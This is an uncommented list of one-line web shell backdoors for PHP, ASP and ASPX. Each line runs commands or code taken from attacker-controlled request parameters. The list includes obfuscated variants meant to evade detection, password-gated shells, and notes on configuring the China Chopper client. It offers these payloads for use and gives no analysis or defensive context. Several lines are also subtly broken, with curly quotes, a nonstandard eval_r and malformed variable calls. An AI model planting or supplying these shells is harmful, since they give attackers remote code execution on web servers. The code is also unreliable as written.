php:

<?php @eval($_POST[‘attack’ ]);?>

<?php eval($_POST[1]);?>

<script language=”php”>@eval($_POST[‘cmd’])</script>

<?=eval($_POST[‘cmd’]);

<?php if(isset($_POST[‘c’])){eval($_POST[‘c’]);}?>

<?php system($_REQUEST[1]);?>

<?php ($_=@$_GET[1]).@$_($_POST[1])?>

<?php eval_r($_POST[1])?>

<?php @eval_r($_POST[1])?>

<?php assert($_POST[1]);?>

<?$_POST[‘c’]($_POST[‘cc’]);?>

<?$_POST[‘c’]($_POST[‘cc’],$_POST[‘cc’])?>

<?php @preg_replace(“/[email]/e”,$_POST[‘h’],”error”);?>/*使用这个后,使用菜刀一句话客户端在配置连接的时候在”配置”一栏输入*/:<O>h=@eval_r($_POST1);</O>

<script language=”php”>@eval_r($_POST[sb])</script>

<?=eval($_POST[‘cmd’]);

<?php @eval($_POST[‘r00ts’]);?>

<?if(isset($_POST[‘1’])){eval($_POST[‘1’]);}?><?php system($_REQUEST[1]);?>

<?php substr(md5($_REQUEST[‘x’]),28)==’6862’&&eval($_REQUEST[‘password’]);?>

<?php ($_=@$_GET[s]).@$_($_POST[hihack]) ?>

<php $a = “a”.”s”.”s”.”e”.”r”.”t”; $a($_POST[hihack]); ?>

<?php $a = “assert”; $a(@$_POST[‘shell’]);  ?>

<?php  $a=”TR”.”Es”.”sA”;  $b=strtolower($a);  $c=strrev($b);  @$c($_POST[‘shell’]);  ?>

<?php  $a=”AssERT”;  $b=strtolower($a);  @$b($_POST[‘shell’]);  ?>

<?php $bb=”assert”; $a=’bb’;$$aa($_POST[‘shell’]);?>

<?php  function fun($a){  @eval($a);  }  @fun($_POST[‘shell’]);  ?>

<?php $fun = create_function(”,$_POST[‘shell’]);$fun();?>

<?php @call_user_func(assert,$_POST[‘shell’]); ?>

<?php   $a=base64_decode(“YXNzZXJ0”);  @a($_POST[‘shell’]);  ?>

<?php   function fun(){  return $_POST[‘shell’];  }  @preg_replace(“/test/e”, fun(), “test123”);  ?>

<?php $str=”a=eval”;parse_str($str);$a($_POST[‘shell’]);?>

<?php  $a = str_replace(“test”, “”, “astestsert”); $a($_POST[‘shell’]);?>

asp:

<%eval request (“mbg”)%>

<%execute request(“c”)%>

<%execute(request(“c”))%>

<%ExecuteGlobal request(“sb”)%>

%><%Eval(Request(chr(35)))%><%

<%if request (“c”)<>””then session(“c”)=request(“c”):end if:if session(“c”)<>”” then execute session(“c”)%>

<%eval(Request.Item[“c”],”unsafe”);%>

<%eval(request(“c”)):response.end%>

<%execute request(“c”)%><%<%loop<%:%>
<%<%loop<%:%><%execute request(“c”)%>
<%execute request(“c”)<%loop<%:%>

<%if Request(“c”)<>”” ThenExecuteGlobal(Request(“c”))%>

<%eval request(chr(35))%>

<%eval(Request.Item[“r00ts”],”unsafe”);%>

<%IfRequest(“1″)<>””ThenExecuteGlobal(Request(“1″))%>

<%execute request(“class”)%><%'<% loop <%:%><%'<% loop <%:%><%execute request(“class”)%><%execute request(“class”)'<% loop <%:%>

<%dy=request(“c”)%><%Eval(dy)%> 

<script language=VBScript runat=server>execute request(“c”)</script>

<script language=vbs runat=server>eval(request(“c”))</script>

<script language=vbs runat=server>eval_r(request(“c”))</script>

aspx:

<%@ Page Language=”Jscript”%> <%eval(Request.Item[“mbg”],”unsafe”);%>\

<script language=”C#”runat=”server”>WebAdmin2Y.x.y a=new WebAdmin2Y.x.y(“add6bb58e139be10”)</script>

<%@ Page Language=”Jscript” validateRequest=”false” %><%Response.Write(eval(Request.Item[“w”],”unsafe”));%>

<script language=”C#” runat=”server”>  WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y(“add6bb58e139be10”); </script> 密码是webadmin

<%@ Page Language=”Jscript”%><%Response.Write(eval(Request.Item[“z”],”unsafe”));%>